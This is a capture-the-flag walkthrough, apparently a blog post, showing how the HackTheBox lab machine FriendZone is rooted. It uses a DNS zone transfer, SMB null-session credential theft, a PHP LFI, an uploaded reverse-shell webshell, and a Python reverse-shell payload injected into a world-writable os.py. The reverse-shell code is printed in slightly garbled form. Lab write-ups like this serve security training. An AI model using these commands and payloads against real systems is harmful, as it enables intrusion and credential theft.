FriendZone HackTheBox WalkThrough
This is FriendZone HackTheBox machine walkthrough and is also the 25th
machine of our OSCP like HTB Boxes
series. In this writeup I have demonstrated step-by-step how I rooted to FriendZone HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a Linux OS
machine with IP address 10.10.10.123
and difficulty easy
assigned by its maker.
Since this machine is retired so you will require VIP subscription at hackthebox.eu
to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN
and confirm your connectivity with this machine by pinging its IP 10.10.10.123. If all goes correct then start hacking.
As usual I started by scanning the machine with Nmap. Scanning
gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-
Scanning
$ sudo nmap -sC -sV -sT -oA nmap/friendzone 10.10.10.123
Nmap found ports 21, 22, 53, 80, 139, 443 and 445. VsFTPd
on port 21
, OpenSSH
on port 22
, DNS
on port 53
, Apache2
on port 80
, SMB
on port 139
& 445
and Apache2
over SSL
on port 443
are running. We have a lot of services to enumerate on. We will start by searching exploits for each version of software shown by nmap. Searchsploit
(an offline tool to query exploit-db.com) did not find any relevant exploit for available software. Perhaps, all the software were up to date when the machine was released. We will have to find some other attack vector using which we can get into the machine.
Since port 21
is open so anonymous login
is the first thing which everyone should check whenever he scan the machine. I tried login with anonymous
: anonymous
, but anonymous login is not allowed. Moving on port 22
, we will try to test login into SSH when we get some credential. For now since there is no any credential available so I moved forward for enumeration on port no 80
and 443
.
URL http://10.10.10.123/ revealed an email address [email protected]
. The extracted domain from it is friendzoneportal.red
. Also nmap script ssl-cert
revealed a domain friendzone.red
. There is also another domain friendzone.htb
which I used to add. In case, if virtual host routing is enabled we would get some other website to enumerate on. So right now we have three domains let us add them to our hosts
file which is located in /etc/
directory.
Host File after Modification
$ cat /etc/hosts
http://friendzone.red, http://friendzoneportal.red, http://friendzone.htb. All three http URLs have the same web pages as we have on page http://10.10.10.123. While https is given below.
https://friendzone.htb/ — Not found
https://friendzoneportal.red/ — Watching you image
https://friendzone.red/ — Ready to escape from FriendZone
We have DNS service running over port 53
and we also have 3 virtual hosts let us check whether DNS Zone transfer
on our local machine is possible or not. When I tried to perform DNS Zone transfer it allowed me to transfer the zone files on my local machine.
Performing DNS Zone Transfer
$dig @10.10.10.123 friendzoneportal.red axfr
$ dig @10.10.10.123 friendzone.red axfr
DNS zone transfer found some more domains. They are admin.friendzoneportal.red
, files.friendzoneportal.red
, imports.friendzoneportal.red
, vpn.friendzoneportal.red
, administrator1.friendzone.red
, hr.friendzone.red
, and uploads.friendzone.red
. We have total of 14 new URLs to check. 7 for http
and 7 for https
. Before accessing them let us add them to our hosts file in the directory /etc/
.
Host File after Modification
$ cat /etc/hosts
Enumeration on Port 80 & 443
All the http URLs have the same pages and many https URLs are dead. I have remarked each URLs below.
http://admin.friendzoneportal.red — Same as initial home page
https://admin.friendzoneportal.red — login-page
http://files.friendzoneportal.red — Same as initial home page
https://files.friendzoneportal.red — Not Found
http://imports.friendzoneportal.red — Same as initial home page
https://imports.friendzoneportal.red — Not Found
http://vpn.friendzoneportal.red — Same as initial home page
https://vpn.friendzoneportal.red — Not Found
http://administrator1.friendzone.red — Same as initial home page
https://administrator1.friendzone.red — Admin Login Page
http://hr.friendzone.red — Same as initial home page
https://hr.friendzone.red — Not Found
http://uploads.friendzone.red — Same as initial home page
https://uploads.friendzone.red — File Upload Options
All the http URLs are useless for now because all have the same page. We will enumerate on them if we will not get anything interesting from https URLs. For now we will focus more on https://admin.friendzoneportal.red & https://administrator1.friendzone.red because they have login pages and we can test a lot of vulnerabilities over them and also https://uploads.friendzone.red for testing file upload vulnerability
. Moving on https://admin.friendzoneportal.red first.
When I tried to login with any credential it gave message “Admin page is not developed yet!!! check for another one
”. This line hints us that there is some other admin login page available.
After going to https://administrator1.friendzone.red found another admin login page. Tried some basic injection like SQL and others but nothing worked. We requires a valid credential to login into it. We will return to this page when we get some credential.
For now let us go to https://uploads.friendzone.red to see what is present. File upload is allowed through it. Even we can upload webshell
through it there is no restriction present. But the problem is, we can’t access our uploaded files. For this we requires some directory listing
or LFI
type vulnerability. Till now both of them are not present.
Enumeration on Port 445
We have port 445 open let us check whether null session
is allowed or not.
$ smbmap -H 10.10.10.123 -R --depth 5
Null session is allowed and we have access to a file creds.txt
inside \general\
folder. Let us download it using $smbclient
.
$ smbclient //10.10.10.123/general
smb: > get creds.txt
smb: > exit
$ cat creds.txt
creds.txt contains credential of user admin.
admin
: WORKWORKHhallelujah@#
After login using this credential at https://administrator1.friendzone.red/login.php told to visit /dashboard.php
.
After going to URL https://administrator1.friendzone.red/dashboard.php listed some parameters image_id=a.jpg&pagename=timestamp
. Next thing I tried to explore my uploaded file with the timestamp which I got after successful file upload but it gave me error.
On spending some more time and doing some enumeration on this URL I found LFI vulnerability. This can be confirmed with the below URL. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login. We can get source-code
of login page from above URL.
$ echo -n "PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K" | base64 -d
After lot of enumeration I could not find my uploaded webshell. From the result of above $smbmap
command $ smbmap -H 10.10.10.123 -R --depth 5
, we found Samba Server Files is stored in directory /etc/Files/
and anonymous user also have write permission at /10.10.10.123/Development/
.
So according to above result our actual file path on the disk should be /etc/Files/Development/shell
but after uploading the shell in Development
folder through $smbclient
, it is accessible at /etc/Development/shell
. This may be due to reason that admin has changed the default directory. The uploaded shell can be executed at URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell (no .php extension is present in shell file because .php extension is truncated from all the php files).
Testing For File Upload
Let us upload a simple php script to check whether we can execute it or not.
$ echo "<?php echo \"This is test php file\" ?>" > test.php
$ cat test.php
$ smbclient //10.10.10.123/Development
smb: \> put test.php
smb: \> exit
The uploaded file can be accessed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
Getting User Shell
Now we have confirmed file upload vulnerability let us upload our webshell to get user shell on our Kali machine.
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php
$ vi shell.php
# change to your tun0 IP
$ cat shell.php | grep -A8 -i 10.10.14.12
$ smbclient //10.10.10.123/Development
smb: \>put shell.php
smb: \> exit
Access this URL to execute the shell. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test. But before accessing it start netcat listener on your terminal.
$ nc -nvlp 1234
$ whoami && id
We have got user shell let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command though it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
After some enumeration found file mysql_data.conf
which contains SSH
credential of user friend
. The file is present in the directory /var/www/
.
$ cat /var/www/mysql_data.conf
The credential is friend
: Agpyu12!0.213$
Let us login to user friend and capture user flag.
SSH into User Friend
$ ssh [email protected]
~Agpyu12!0.213$
$ whoami && id
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector using which we perform privilege escalation. You can run some privilege escalation enumeration script like Linpeas and LinEnum to do this job or enumerate manually. I tried to use Linpeas but it could not found the PrivEsc vector. So I have to manually enumerate and find PrivEsc vector.
Finding PrivEsc Vector
After some enumeration found a file reporter.py
inside the directory /opt/server_admin/
.
$ cat /opt/server_admin/reporter.py
Meanwhile, I ran pspy (a process monitoring tool) to monitor processes
running on the remote machine. It reported reporter.py
is being executed at interval of every 2 min by root. If we have write permission
to change the content of this file we would definitely get root shell. But normal user has not given write permission as you can see in the screenshot.
One thing to be noted
in above script is that it is importing OS module
in the script. If we have permission to introduce our reverse shell code in os.py
file then our reverse shell code will definitely be executed with root permission when reporter.py
file executes and we will get reverse shell on our netcat listener.
$ ls -la /opt/server_admin/reporter.py
Let us check the permission of os.py.
$ locate os.py
$ ls -la /usr/lib/python2.7/os.py
os.py
is given write permission from the root user to every other users. So here we can make our reverse shell code be executed by root by introducing in os.py file. When I did this I got reverse shell with root privilege very easily. So here our PrivEsc vector is Privilege Escalation using Python Library Hijacking
. For more info on python library hijacking check this blog. See HTB box writeup with same privilege escalation vector here.
Getting Root Shell
To get root shell start netcat listener in one window and paste the following reverse shell code in the os.py file by changing the IP and save it. After that wait for 2 min to get the shell.
import ptyimport sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.10.14.7",9001))dup2(s.fileno(),0)dup2(s.fileno(),1)dup2(s.fileno(),2)pty.spawn("/bin/bash")s.close()
$ nano /usr/lib/python2.7/os.py
$ tail -13 /usr/lib/python2.7/os.py
$ nc -nvlp 9001
# whoami && id
We have got root shell. Let us capture root flag.
Capture Root Flag
$ cat root.txt
This was how I rooted to the FriendZone HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.